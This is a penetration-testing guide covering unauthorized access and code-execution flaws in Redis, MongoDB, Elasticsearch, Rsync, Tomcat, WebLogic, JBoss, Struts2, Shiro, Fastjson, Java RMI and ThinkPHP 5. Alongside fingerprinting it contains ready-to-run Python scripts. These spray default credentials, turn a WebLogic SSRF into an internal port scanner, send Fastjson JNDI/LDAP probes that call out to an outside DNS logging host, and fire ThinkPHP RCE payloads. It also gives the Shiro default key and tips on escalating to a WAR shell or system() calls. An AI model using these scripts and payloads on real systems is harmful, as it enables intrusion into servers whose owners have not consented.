Unauthorized-access and code-execution vulnerabilities: characteristics and detection methods

Article directory

  • 1. Unauthorized access to Redis
  • 2. Unauthorized access to MongoDB
  • 3. Unauthorized access to Elasticsearch
  • 4. Unauthorized access to Rsync
  • 5. Windows RDP remote code execution vulnerability (CVE-2019-0708)
  • 6. Tomcat Web Console Weak Password
  • 7. WebLogic console weak password & deserialization series vulnerabilities
  • 8. WebLogic SSRF (no detection method)
  • 9. WebLogic deserialization tool
  • 10. JBoss Deserialization & Default Configuration Vulnerability
  • 11. Apache Struts2 remote code execution vulnerability
  • 12. Apache Shiro deserialization vulnerability (no detection method)
  • 13. Fastjson deserialization vulnerability
  • 14. Java RMI deserialization vulnerability (no detection method)
  • 15. ThinkPHP5 code execution vulnerability

1. Unauthorized access to Redis

telnet <ip> <port>

Then type info and press Enter. If the server answers with its version and runtime details (a redis_version: line followed by the rest of the INFO output), it accepts commands without authentication. A hardened instance answers "-NOAUTH Authentication required." instead, and Redis 3.2 and later with no password set refuse non-loopback clients with "-DENIED Redis is running in protected mode", which is not reachable from outside.

2. Unauthorized access to MongoDB

Detect with the GUI client Robo 3T: create a connection to the MongoDB server, enter the IP address and port (default 27017) and click Test. If the server has no authentication enabled, the dialog reports "Access to databases is available". The same check from the command line is mongo --host <ip> --port 27017 followed by show dbs: an open instance lists every database, while an authenticated one fails with "not authorized on admin to execute command".

3. Unauthorized access to Elasticsearch

Open http://www.example.com:9200/_nodes in a browser. An unauthenticated node returns JSON with the cluster name and, for each node, its name, hostname, IP address and Elasticsearch version; a node protected by X-Pack security or a reverse proxy answers 401 instead. If _nodes is open, http://www.example.com:9200/_cat/indices lists the indices with their document counts and sizes, and their contents can be read through _search.

4. Unauthorized access to Rsync

From the command line run rsync rsync://<ip>:<port>/ (default port 873). If the daemon lists its modules without asking for credentials, the module list is exposed; rsync rsync://<ip>:<port>/<module>/ then lists all files in the path that module maps to.
Authentication in rsyncd.conf is configured per module ("auth users"), so a module that appears in the listing can still answer "@RSYNCD: AUTHREQD" when you try to read it; check each module separately. A module that is not "read only" additionally accepts uploads, which is what turns an exposed daemon into a code-execution path.
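What the two rsync commands do on the wire, as an added example that is not part of the original article: the daemon protocol is line based, so the module list and the per-module "OK" / "AUTHREQD" decision can be read directly. The host, port and module names are assumptions and SAMPLE_LISTING is constructed.

```python
# Added example, not part of the original article: talk the rsync daemon
# protocol directly (what "rsync rsync://<ip>:<port>/" does under the hood) to
# list modules and to ask whether a module demands credentials. Host, port and
# module names are assumptions; SAMPLE_LISTING is constructed.
import socket
from typing import Dict, List, Optional

GREETING = b"@RSYNCD: 31.0\n"   # protocol 31 (rsync 3.1+); the daemon negotiates down


class LineReader:
    """Minimal newline-delimited reader over a socket."""

    def __init__(self, sock: socket.socket) -> None:
        self.sock, self.buf = sock, b""

    def readline(self) -> Optional[str]:
        while b"\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                return None
            self.buf += chunk
        line, self.buf = self.buf.split(b"\n", 1)
        return line.decode("utf-8", "replace")


def parse_module_listing(lines: List[str]) -> Dict[str, str]:
    """Module list lines are 'name<TAB>comment'; '@RSYNCD: EXIT' ends the list."""
    modules: Dict[str, str] = {}
    for line in lines:
        if line.startswith("@RSYNCD: EXIT"):
            break
        if line.startswith("@") or not line.strip():
            continue                       # control lines, motd blank lines
        name, _, comment = line.partition("\t")
        modules[name.strip()] = comment.strip()
    return modules


def classify_module_reply(line: str) -> str:
    """Reply to sending a module name: OK means no credentials are needed."""
    if line.startswith("@RSYNCD: OK"):
        return "unauthenticated"
    if line.startswith("@RSYNCD: AUTHREQD"):
        return "auth-required"             # the rest of the line is the challenge
    if line.startswith("@ERROR"):
        return "error: " + line[len("@ERROR"):].strip(": ")
    return "unknown"                       # motd text; keep reading


def _handshake(sock: socket.socket) -> LineReader:
    reader = LineReader(sock)
    banner = reader.readline()
    if not banner or not banner.startswith("@RSYNCD:"):
        raise RuntimeError("not an rsync daemon: %r" % banner)
    sock.sendall(GREETING)
    return reader


def list_modules(host: str, port: int = 873, timeout: float = 5.0) -> Dict[str, str]:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = _handshake(sock)
        sock.sendall(b"#list\n")
        lines: List[str] = []
        while True:
            line = reader.readline()
            if line is None or line.startswith("@RSYNCD: EXIT"):
                break
            lines.append(line)
    return parse_module_listing(lines)


def check_module(host: str, module: str, port: int = 873, timeout: float = 5.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = _handshake(sock)
        sock.sendall(module.encode() + b"\n")
        while True:
            line = reader.readline()
            if line is None:
                return "unknown"
            verdict = classify_module_reply(line)
            if verdict != "unknown":
                return verdict


# Constructed sample (not captured from a real daemon).
SAMPLE_LISTING = ["", "backup\tNightly backups", "www\tWeb root", "@RSYNCD: EXIT"]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # assumption
    for name in list_modules(target):
        print(name, check_module(target, name))
```

Modules configured with "list = false" never show up in the listing but still answer a direct module request, so a wordlist of common module names (backup, www, data, home) is worth trying against check_module even when list_modules comes back empty.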

5. Windows RDP Remote Code Execution Vulnerability (CVE-2019-0708)

Use the tool rdpscan.exe (the BlueKeep scanner). It accepts a single IP address, a CIDR range or a file of addresses, and reports each host as SAFE, VULNERABLE or UNKNOWN. Usage:
(a) rdpscan.exe 192.168.1.0/24
(b) rdpscan.exe 192.168.1.1 -p 13389
(c) rdpscan.exe --file ip.txt
UNKNOWN means the scanner could not complete the RDP handshake (filtered port, wrong port, connection dropped), not that the host is patched; rescan those hosts individually from inside the segment. The check itself is non-destructive.

6. Tomcat Web Console Weak Password

Run msfconsole in Kali Linux, use auxiliary/scanner/http/tomcat_mgr_login, set RHOSTS, RPORT (default 8080) and TARGETURI (default /manager/html), then run. The module tries its built-in list of default Tomcat credentials against the manager's HTTP Basic prompt and prints any pair that is accepted. Tomcat's LockOutRealm locks an account after five failed logins by default, so keep custom wordlists short and spread attempts out.

7. WebLogic console weak password & deserialization series vulnerabilities

Append a random string to a URL of the application under test so that it returns a 404. WebLogic's default 404 page is distinctive: it quotes "From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: 10.4.5 404 Not Found". If that page comes back, the middleware is WebLogic (the administration console, when enabled, sits at /console, usually on port 7001).

Test Methods
Capture a request to the application under test in Burp Suite and send it to Repeater. Use Change request method to turn it into a POST, set the path to /bea_wls_deployment_internal/DeploymentService, add the request headers username: weblogic and password: weblogic, and send it.

With a wrong password the response is 401 Unauthorized with the text "Invalid user name or password". With the correct password the response is 500 Internal Server Error: the servlet authenticated the user and then failed on the empty deployment request, so the 500 is the success oracle here. Try the other common defaults (weblogic/welcome1, weblogic/Oracle@123, weblogic/weblogic1) the same way, keeping in mind that WebLogic locks an account after five failed logins by default.
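The two credential checks above (the Tomcat manager Basic-auth prompt from section 6 and the WebLogic DeploymentService oracle from section 7) done with urllib, as an added example that is not part of the original article; the base URLs and the default credential list are assumptions.

```python
# Added example, not part of the original article: the two credential checks
# from sections 6 and 7 done with urllib instead of Metasploit and Burp. Base
# URLs and the credential list are assumptions.
import base64
import urllib.error
import urllib.request
from typing import Iterable, Optional, Tuple

# Commonly tried Tomcat manager defaults (assumed list; extend as needed)
DEFAULT_CREDS = [("tomcat", "tomcat"), ("admin", "admin"), ("admin", "tomcat"),
                 ("tomcat", "s3cret"), ("manager", "manager"), ("role1", "tomcat")]


def _send(req: urllib.request.Request, timeout: float = 10.0) -> Tuple[int, str]:
    """Return (status, body) and treat 4xx/5xx as answers, not exceptions."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify_tomcat_manager(status: int) -> str:
    if status == 200:
        return "valid"                       # logged in with the manager-gui role
    if status == 403:
        return "valid, but no manager role"  # Tomcat authenticates, then denies by role
    if status == 401:
        return "rejected"
    if status == 404:
        return "manager app not deployed"
    return "unknown (%d)" % status


def check_tomcat_manager(base_url: str, username: str, password: str,
                         target_uri: str = "/manager/html") -> str:
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    req = urllib.request.Request(base_url.rstrip("/") + target_uri,
                                 headers={"Authorization": "Basic " + token})
    status, _ = _send(req)
    return classify_tomcat_manager(status)


def spray_tomcat_manager(base_url: str,
                         creds: Iterable[Tuple[str, str]] = DEFAULT_CREDS) -> Optional[Tuple[str, str]]:
    """First (user, password) the manager accepts, or None. Keep the list short:
    Tomcat's LockOutRealm locks an account after 5 failures by default."""
    for user, pw in creds:
        if check_tomcat_manager(base_url, user, pw).startswith("valid"):
            return user, pw
    return None


def classify_weblogic_deployment(status: int, body: str) -> str:
    """Oracle from the article: 401 + 'Invalid user name or password' means
    rejected; 500 means the credentials passed and the servlet then choked on
    the empty request."""
    if status == 401 or "Invalid user name or password" in body:
        return "rejected"
    if status == 500:
        return "accepted"
    if status == 404:
        return "DeploymentService not found"
    return "unknown (%d)" % status


def check_weblogic_deployment(base_url: str, username: str = "weblogic",
                              password: str = "weblogic") -> str:
    req = urllib.request.Request(
        base_url.rstrip("/") + "/bea_wls_deployment_internal/DeploymentService",
        data=b"", method="POST",
        headers={"username": username, "password": password})
    status, body = _send(req)
    return classify_weblogic_deployment(status, body)


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"   # assumption
    print("tomcat:", spray_tomcat_manager(base))
    print("weblogic:", check_weblogic_deployment(base))
```

A valid Tomcat manager login with the manager-gui role is code execution: the Deploy form accepts a WAR containing a JSP shell. The WebLogic check only confirms the administrative credentials; the console at /console is where they are then used.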

8. WebLogic SSRF (no detection method)

http://www.example.com:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
If the page contains the string "weblogic.uddi.client.structures.exception.XML_SoapException", the UDDI Explorer application is present and the server followed the URL in the operator parameter, i.e. the WebLogic instance has the SSRF (CVE-2014-4210).

Change the port number at the end of the URL to common ports (22, 80, 443, 7001, 8080 and so on). The error text changes with the state of the port, which turns the SSRF into a port scanner for the server's internal network: an open port yields "Received a response from url: ... which did not have a valid SOAP content-type", a closed port yields "Tried all: '1' addresses, but could not connect over HTTP to server". Seeing both messages for different ports confirms the SSRF; the operator parameter accepts any host, so the same request enumerates internal addresses too.
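The port-scan loop just described, as an added example that is not part of the original article: it builds the UDDI Explorer request for each port and classifies the error text that leaks back. The base URL, target host and port list are assumptions; the SAMPLE_* bodies are constructed to mirror the two error messages.

```python
# Added example, not part of the original article: use the UDDI Explorer SSRF
# as a port scanner for the WebLogic host's internal network, classifying the
# error text that leaks back. Base URL, target host and port list are
# assumptions; the SAMPLE_* bodies are constructed from the known error format.
import urllib.error
import urllib.parse
import urllib.request
from typing import Dict, Iterable

SSRF_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"


def build_ssrf_url(base_url: str, target_host: str, target_port: int) -> str:
    params = [("rdoSearch", "name"), ("txtSearchname", "sdf"), ("txtSearchkey", ""),
              ("txtSearchfor", ""), ("selfor", "Business location"), ("btnSubmit", "Search"),
              ("operator", "http://%s:%d" % (target_host, target_port))]
    return base_url.rstrip("/") + SSRF_PATH + "?" + urllib.parse.urlencode(params)


def classify_ssrf_body(body: str) -> str:
    """The SOAP client's exception text tells open from closed ports."""
    if "could not connect over HTTP to server" in body:
        return "closed"
    if "did not have a valid SOAP content-type" in body:
        return "open (non-SOAP service answered)"
    if "XML_SoapException" in body:
        return "open (some other SOAP-layer error)"
    return "no SSRF indicator"               # endpoint absent, patched, or not WebLogic


def scan_ports(base_url: str, target_host: str, ports: Iterable[int],
               timeout: float = 15.0) -> Dict[int, str]:
    results: Dict[int, str] = {}
    for port in ports:
        req = urllib.request.Request(build_ssrf_url(base_url, target_host, port))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            body = err.read().decode("utf-8", "replace")
        results[port] = classify_ssrf_body(body)
    return results


# Constructed bodies mirroring the two WebLogic error messages.
SAMPLE_CLOSED = ("weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' "
                 "addresses, but could not connect over HTTP to server: '127.0.0.1', port: '7000'")
SAMPLE_OPEN = ("weblogic.uddi.client.structures.exception.XML_SoapException: Received a response "
               "from url: http://127.0.0.1:7001 which did not have a valid SOAP content-type: text/html.")

if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com:7001"   # assumption
    for port, verdict in scan_ports(base, "127.0.0.1", [22, 80, 443, 7001, 8080]).items():
        print(port, verdict)
```

Closed ports answer quickly while filtered ones make the server wait for its own connect timeout, so a long urlopen timeout is deliberate; a request that times out on your side is itself a hint that the port is filtered rather than closed.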

9. WebLogic Deserialization Tool

10. JBoss Deserialization & Default Configuration Vulnerability

The response headers of the application under test contain a JBoss string (typically X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA or similar),

or the 404 page of the application under test contains the string JBossWeb.

Test Methods
Run msfconsole in Kali Linux, use auxiliary/scanner/http/jboss_vulnscan, set RHOSTS and RPORT (JBoss usually listens on 8080; use the port you observed), then run. The module checks whether the jmx-console, the web-console, /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet are reachable without authentication: the two invoker servlets are the Java deserialization entry points, and an open jmx-console lets anyone deploy a WAR through the deployment MBean.

11. Apache Struts2 remote code execution vulnerability

Look at the application under test: if its URLs end in .action or .do, or contain a "!" (dynamic method invocation, e.g. login!execute.action), it is probably built on Struts2. On the server, check the application's /WEB-INF/lib/ directory: a jar named struts2-core-2.*.jar or xwork-core-2.*.jar confirms Struts2 and gives the version, which decides which of the S2 remote code execution vulnerabilities apply and therefore has to be tested.
Detection Tool

12. Apache Shiro deserialization vulnerability (no detection method)

Capture a request to the application under test in Burp Suite, add rememberMe=1 to the Cookie header and replay it. If the response carries the header Set-Cookie: rememberMe=deleteMe, the application is built on Apache Shiro: it tried to decrypt the cookie, failed, and told the browser to delete it.

On the server, check /WEB-INF/lib/ of the application: a jar named shiro-core-1.*.jar confirms Shiro and the version. Versions up to 1.2.4 ship a hard-coded default rememberMe key (kPH+bIxk5D2deZiIxcaaaA==), so such an application is directly exploitable; later versions are only exploitable when the deployment uses a key that has leaked or was copied from a public example, which is why the deserialization check is worth running regardless of version.

13. Fastjson deserialization vulnerability

Check /WEB-INF/lib/ on the server for a jar named fastjson-1.2.*.jar, or capture traffic and look for the string "com.alibaba.fastjson" in responses (it appears in stack traces and error messages when malformed JSON is submitted). Either finding means the application has to be tested for Fastjson deserialization.

Detection method
Register a ceye.io account as described earlier; your identifier (the <id> in <id>.ceye.io) is shown at http://ceye.io/profile. Capture a request that carries a JSON body in Burp Suite and replace the body with the following probes, one after another:
(a) {"@type":"java.net.InetAddress","val":"fastjson.<id>.ceye.io"}
(b) {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson.<id>.ceye.io/","autoCommit":true}
(c) {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson.<id>.ceye.io/","autoCommit":true}}
Then open http://ceye.io/records/dns. A resolution record for a name starting with fastjson means the target parsed the body with Fastjson and honoured @type. Probe (a) proves only that; (b) or (c) resolving means a JNDI/LDAP lookup was attempted, i.e. the JdbcRowSetImpl gadget is reachable ((c) is the java.lang.Class cache trick that works up to 1.2.47 even with autoType disabled). Whether the lookup becomes code execution also depends on the JDK: from 8u191 on, LDAP remote class loading is off by default, so a bare codebase URL is not enough and the LDAP server has to return a local gadget chain instead.
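Building the three probes with a distinct DNS label and a random tag per run, as an added example that is not part of the original article: the ceye.io log then shows which vector fired and cannot be confused by records from an earlier test. ceye_id is your own ceye.io identifier; the target URL, tag format and SAMPLE_DNS_LOG are assumptions/constructed.

```python
# Added example, not part of the original article: build the three Fastjson
# probes from (a)-(c) with per-probe DNS labels so the ceye.io log tells you
# which vector fired, send them, and match the log entries back. ceye_id is
# your own ceye.io identifier (from http://ceye.io/profile); target URL, tag
# format and the sample DNS log are assumptions/constructed.
import json
import urllib.error
import urllib.request
import uuid
from typing import Dict, Iterable, Optional, Set


def probe_host(ceye_id: str, label: str, tag: str) -> str:
    return "fastjson-%s-%s.%s.ceye.io" % (label, tag, ceye_id)


def build_fastjson_probes(ceye_id: str, tag: Optional[str] = None) -> Dict[str, str]:
    """Return {name: json_body}. tag is random per run so stale records cannot confuse you."""
    tag = tag or uuid.uuid4().hex[:8]
    probes = {
        # (a) only resolves a hostname: proves the parser honours @type
        "a-inetaddress": {"@type": "java.net.InetAddress",
                          "val": probe_host(ceye_id, "a", tag)},
        # (b) JdbcRowSetImpl triggers a JNDI/LDAP lookup when autoType is reachable
        "b-jdbcrowset": {"@type": "com.sun.rowset.JdbcRowSetImpl",
                         "dataSourceName": "ldap://%s/" % probe_host(ceye_id, "b", tag),
                         "autoCommit": True},
        # (c) same sink, preceded by the java.lang.Class cache trick that works
        #     up to 1.2.47 even with autoType disabled
        "c-class-cache": {"name": {"@type": "java.lang.Class",
                                   "val": "com.sun.rowset.JdbcRowSetImpl"},
                          "x": {"@type": "com.sun.rowset.JdbcRowSetImpl",
                                "dataSourceName": "ldap://%s/" % probe_host(ceye_id, "c", tag),
                                "autoCommit": True}},
    }
    return {name: json.dumps(body) for name, body in probes.items()}


def send_probe(url: str, body: str, timeout: float = 10.0) -> int:
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code                   # any status is fine; the DNS log is the oracle


def fired_probes(dns_names: Iterable[str], tag: str) -> Set[str]:
    """Which labels (a/b/c) appear in the DNS log for this run's tag."""
    hits: Set[str] = set()
    for name in dns_names:
        first = name.split(".", 1)[0]
        if first.startswith("fastjson-") and first.endswith("-" + tag):
            hits.add(first.split("-")[1])
    return hits


# Constructed DNS log (what http://ceye.io/records/dns might list), not real data.
SAMPLE_DNS_LOG = ["fastjson-a-t1.abcdef.ceye.io", "fastjson-b-t1.abcdef.ceye.io",
                  "fastjson-a-old.abcdef.ceye.io", "other.abcdef.ceye.io"]

if __name__ == "__main__":
    import sys
    target, ceye_id = (sys.argv[1:3] if len(sys.argv) > 2
                       else ("http://www.example.com/api", "abcdef"))   # assumptions
    tag = uuid.uuid4().hex[:8]
    for name, body in build_fastjson_probes(ceye_id, tag).items():
        print(name, send_probe(target, body))
    print("now check the DNS log for labels ending in -%s" % tag)
```

Paste the hostnames from the DNS records page into fired_probes with the printed tag: {"a"} alone means Fastjson with @type processing but the LDAP gadget blocked, while "b" or "c" present means a JNDI lookup left the server and the next step is an LDAP server you control.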

14. Java RMI deserialization vulnerability (no detection method)

If the server hosting the application under test listens on port 1099, or a full port scan (nmap -v -A -p 1-65535 <ip>) identifies the service on some port as java-rmi (Java RMI Registry), the host has to be tested for Java RMI deserialization: the registry deserializes whatever objects are sent to it, and exploitability then depends mostly on the JDK, since the JEP 290 filters (8u121, 7u131 and later) block the common gadget chains.
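Confirming that a port really speaks JRMP (the RMI wire protocol) rather than trusting the nmap service name, as an added example that is not part of the original article: it sends the JRMI stream-protocol handshake and parses the ProtocolAck. The host and port are assumptions; SAMPLE_ACK is constructed.

```python
# Added example, not part of the original article: confirm a port speaks JRMP
# (the Java RMI wire protocol) by sending the JRMI stream handshake and parsing
# the ProtocolAck, which is what nmap's java-rmi detection relies on. Host and
# port are assumptions; SAMPLE_ACK is constructed.
import socket
import struct
from typing import Optional, Tuple

RMI_MAGIC = b"JRMI"        # 0x4a524d49
RMI_VERSION = 2
STREAM_PROTOCOL = 0x4b
PROTOCOL_ACK = 0x4e        # 0x4f would be ProtocolNack


def build_rmi_handshake() -> bytes:
    """Magic (4 bytes) + version (short) + protocol byte, as the JDK's TCPChannel sends it."""
    return RMI_MAGIC + struct.pack(">HB", RMI_VERSION, STREAM_PROTOCOL)


def parse_rmi_ack(data: bytes) -> Optional[Tuple[str, int]]:
    """ProtocolAck is 0x4e followed by an endpoint: writeUTF(host) + writeInt(port).
    Returns (host, port) or None when the peer is not JRMP."""
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (host_len,) = struct.unpack(">H", data[1:3])
    if len(data) < 7 + host_len:
        return None
    host = data[3:3 + host_len].decode("utf-8", "replace")
    (port,) = struct.unpack(">i", data[3 + host_len:7 + host_len])
    return host, port


def probe_rmi(host: str, port: int = 1099, timeout: float = 5.0) -> Optional[Tuple[str, int]]:
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_rmi_handshake())
        while True:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
            if data[0] != PROTOCOL_ACK:
                break                          # not JRMP (or a NACK)
            if len(data) >= 3 and len(data) >= 7 + struct.unpack(">H", data[1:3])[0]:
                break                          # full endpoint received
    return parse_rmi_ack(data)


# Constructed reply: ack, then the endpoint the server echoes back
# (its view of the client address, port 0).
SAMPLE_ACK = bytes([PROTOCOL_ACK]) + struct.pack(">H", 9) + b"127.0.0.1" + struct.pack(">i", 0)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # assumption
    ep = probe_rmi(target, int(sys.argv[2]) if len(sys.argv) > 2 else 1099)
    print("JRMP endpoint, server sees us as %s:%d" % ep if ep else "not JRMP")
```

The endpoint in the ack is the server's view of your own address, which is a free check for NAT or a proxy between you and the target. A JRMP listener on any port (JMX over RMI commonly sits on 1099, 8999 or 9999) is a deserialization sink; what happens after the handshake is where the JDK version and JEP 290 filters decide the outcome.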

15. ThinkPHP5 code execution vulnerability

Open the application under test. If an error page (or the default welcome page) shows the slogan "十年磨一剑 - 为API开发设计的高性能框架" ("Ten years sharpening a sword - a high-performance framework designed for API development"), the application is built on ThinkPHP 5.
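The passive fingerprints scattered through sections 7, 10, 11, 12, 13 and 15 (WebLogic 404 page, JBoss headers, Struts2 URL shapes, Shiro's rememberMe=deleteMe, com.alibaba.fastjson in responses, the ThinkPHP 5 slogan) collected into one function over a captured response, as an added example that is not part of the original article. The default URL and the SAMPLE_* responses are assumptions/constructed.

```python
# Added example, not part of the original article: the passive fingerprints
# from sections 7, 10, 11, 12, 13 and 15 as one function over a captured
# response, plus a helper that fetches the two responses it needs. The default
# URL and the SAMPLE_* responses are assumptions/constructed.
import re
import urllib.error
import urllib.request
import uuid
from typing import Iterable, List, Set, Tuple

HeaderItems = Iterable[Tuple[str, str]]


def detect_stack(status: int, header_items: HeaderItems, body: str, url: str = "") -> Set[str]:
    """Return the set of frameworks/middleware this response points at.
    header_items is a list of (name, value) pairs so repeated Set-Cookie survives."""
    headers = {}
    for name, value in header_items:
        headers.setdefault(name.lower(), []).append(value)
    found: Set[str] = set()
    # WebLogic's stock 404 page quotes the RFC (known default page text).
    if "From RFC 2068 Hypertext Transfer Protocol" in body:
        found.add("weblogic")
    server_ish = " ".join(headers.get("x-powered-by", []) + headers.get("server", []))
    if "jboss" in server_ish.lower() or "JBossWeb" in body:
        found.add("jboss")
    # Shiro answers an undecryptable rememberMe cookie by deleting it.
    if any("rememberMe=deleteMe" in v for v in headers.get("set-cookie", [])):
        found.add("shiro")
    if "com.alibaba.fastjson" in body:
        found.add("fastjson")
    # ThinkPHP 5 welcome/error page slogan (shown translated in the article)
    if "十年磨一剑" in body or re.search(r"ThinkPHP\s*V?5\.", body):
        found.add("thinkphp")
    path = url.split("?", 1)[0]
    if path.endswith((".action", ".do")) or "!" in path:
        found.add("struts2")
    return found


def _fetch(url: str, headers: dict, timeout: float = 10.0) -> Tuple[int, List[Tuple[str, str]], str]:
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, list(resp.headers.items()), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, list(err.headers.items()), err.read().decode("utf-8", "replace")


def fingerprint(base_url: str) -> Set[str]:
    """One request with rememberMe=1 (Shiro) and one to a random path (404 pages)."""
    found = detect_stack(*_fetch(base_url, {"Cookie": "rememberMe=1"}), url=base_url)
    junk = base_url.rstrip("/") + "/" + uuid.uuid4().hex
    found |= detect_stack(*_fetch(junk, {}), url=junk)
    return found


# Constructed responses (not captured from real hosts).
SAMPLE_WEBLOGIC_404 = "<html>From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: 10.4.5 404 Not Found</html>"
SAMPLE_SHIRO_HEADERS = [("Set-Cookie", "JSESSIONID=abc; Path=/; HttpOnly"),
                        ("Set-Cookie", "rememberMe=deleteMe; Path=/; Max-Age=0")]
SAMPLE_JBOSS_HEADERS = [("X-Powered-By", "Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA)")]

if __name__ == "__main__":
    import sys
    print(fingerprint(sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com"))  # assumption
```

Each tag only says which of the sections above to work through next; none of them is a vulnerability by itself. The Shiro check in particular needs the cookie to reach the application's filter chain, so send it to the login page or application root rather than to a static asset.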

Detection method
http://www.example.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=hi
If the response contains the string "49f68a5c8493ec2c0bf489821c21fc3b" (the MD5 of "hi"), the route parameter reached call_user_func_array and there is code execution. This vector affects ThinkPHP 5.0.x and 5.1.x before the fixes in 5.0.23 and 5.1.31.

POST the body _method=__construct&filter[]=phpinfo&method=get&get[]=1 to http://www.example.com/?s=captcha. If the response contains phpinfo output, there is code execution: _method overrides the request method with __construct, which re-runs Request::__construct with filter=phpinfo, so every GET parameter is passed through phpinfo(). This vector affects ThinkPHP 5.0.x up to and including 5.0.23.
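The two ThinkPHP 5 checks scripted with a fresh random token in place of the fixed "hi", as an added example that is not part of the original article: the expected MD5 is computed locally for each request, so a cached page or a WAF decoy that simply contains the well-known hash cannot produce a false positive. The base URL is an assumption.

```python
# Added example, not part of the original article: the two ThinkPHP 5 checks
# above with a fresh random token instead of the fixed "hi", so the expected
# md5 is computed locally per request and a canned or cached response cannot
# produce a false positive. Base URL is an assumption.
import hashlib
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Tuple


def expected_md5(token: str) -> str:
    return hashlib.md5(token.encode()).hexdigest()   # md5("hi") is the article's 49f68a5c...


def invokefunction_url(base_url: str, token: str) -> str:
    """Vector 1 (5.0.x/5.1.x): route to \\think\\app::invokefunction and have it
    call call_user_func_array('md5', [token])."""
    query = ("s=index/\\think\\app/invokefunction&function=call_user_func_array"
             "&vars[0]=md5&vars[1][]=" + urllib.parse.quote(token))
    return base_url.rstrip("/") + "/index.php?" + query


def captcha_post_body() -> str:
    """Vector 2 (5.0.x): _method=__construct re-runs Request::__construct with
    our filter, so GET parameters pass through phpinfo()."""
    return urllib.parse.urlencode([("_method", "__construct"), ("filter[]", "phpinfo"),
                                   ("method", "get"), ("get[]", "1")])


def _body(req: urllib.request.Request, timeout: float = 10.0) -> str:
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def check_invokefunction(base_url: str) -> Tuple[bool, str]:
    """Returns (vulnerable, token) so the token can be grepped in proxy logs."""
    token = secrets.token_hex(8)
    body = _body(urllib.request.Request(invokefunction_url(base_url, token)))
    return expected_md5(token) in body, token


def check_captcha(base_url: str) -> bool:
    req = urllib.request.Request(base_url.rstrip("/") + "/?s=captcha",
                                 data=captcha_post_body().encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    body = _body(req)
    return "phpinfo()" in body and "PHP Version" in body


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://www.example.com"   # assumption
    print("invokefunction:", check_invokefunction(base))
    print("captcha:", check_captcha(base))
```

Both checks are benign (md5 of a random string, phpinfo output); swapping md5 for system in vars[0] is the step that turns the first one into command execution, which is why a positive result here should be reported as code execution even though no command was run.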